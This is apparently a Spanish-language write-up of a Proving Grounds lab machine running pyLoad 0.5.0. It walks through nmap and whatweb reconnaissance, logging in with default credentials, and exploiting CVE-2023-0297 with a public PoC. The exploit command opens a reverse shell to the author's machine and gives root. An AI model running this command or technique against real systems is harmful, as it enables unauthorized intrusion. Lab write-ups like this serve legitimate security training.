> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-pyloader-pyload-0.5.0-rce-no-autenticado.md).

# MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)

Enumere los puertos de la maquina utilizando lo siguientes comandos:

```
nmap -p- --open --min-rate 4000 -sS -v -Pn <ip>
```

`# datos de los comandos:`

`-p-: indica que realize el escaneo en los 65365 puertos`

`--open: indica que solo muestre los puertos abiertos`

`--min-rate 4000: lo use para que envie no menos de 4000 paquetes por segundo.`

`-sS: realiza un escaneo sigiloso, en lugar de completar la conexión con un ACK,`

`Nmap envía un **RST** (reset), evitando establecer una conexión completa.`

`-v: muestra por consola los puertos que se encuentran abiertos`

`-Pn: deshabilita la deteccion de hosts.`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FpeDIoZO7jOCqkVas9tYT%2F0.png?alt=media)

Seguidamente como obtuve solo 2 puertos ejecute nmap con lo parámetro "-sCV" para que me muestre los servicios y la versiones de esos servicios.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FwbYaz4ECtJwrHvlHYOHZ%2F1.png?alt=media)

Como tengo un servidor web en el puerto 9666 con whatweb voy a ver las tecnologías que emplean en dicho servidor.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F1mLU6pD8Fr48GXS191ye%2F2.png?alt=media)

Ya al tener los resultado de whatweb, ingreso al sitio web para realizar un reconocimiento mas cómodo.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F3i2DhSW87d0JVPB0nxUY%2F3.png?alt=media)

Luego de cargar la web, encontré un panel de login de un software llamado "pyLoad", probé credenciales por defecto como en toda prueba y no resulto.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FEqRX6hRoNrX8XkAAsp5X%2F4.png?alt=media)

Pase por google para ver si existen credenciales que vengan por defecto.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FWTo1eu6MBqfPQh6xh4Zj%2F5.png?alt=media)

Luego use las encontradas, una vez colocada obtuve acceso dentro del panel administrador.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FDFuSyueHhXIUvOKQN6bN%2F6.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fxxv3sQeIbFBM3K3aGalJ%2F7.png?alt=media)

Tengo la versión del software es la 0.5.0. Con la versión en la mano busque si contiene alguna vulnerabilidad en google.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FJQB34vIhJv6wA6edvogz%2F8.png?alt=media)

`https://github.com/JacobEbben/CVE-2023-0297`

Este software es vulnerable a un RCE no autenticado por lo que no necesariamente necesitaría las credenciales.

Primero ejecute el siguiente comando donde me indico un PoC.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FP4g7MN1u1Q6yKnTC03d1%2F9.png?alt=media)

Reemplace los comandos y le agregue mi IP y un puerto .. esto va a realizar una conexión con mi kali.

`python3 exploit.py -t` [`http://192.168.106.26:9666/`](http://192.168.106.26:9666/) `-I 192.168.45.240 -P 4443`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fz6rg9SGdKK8PX2yFHIUG%2F10.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FDQP9Qg262NwOm11cjmQ3%2F11.png?alt=media)

Ejecute el exploit y accedí dentro de la maquina como root.
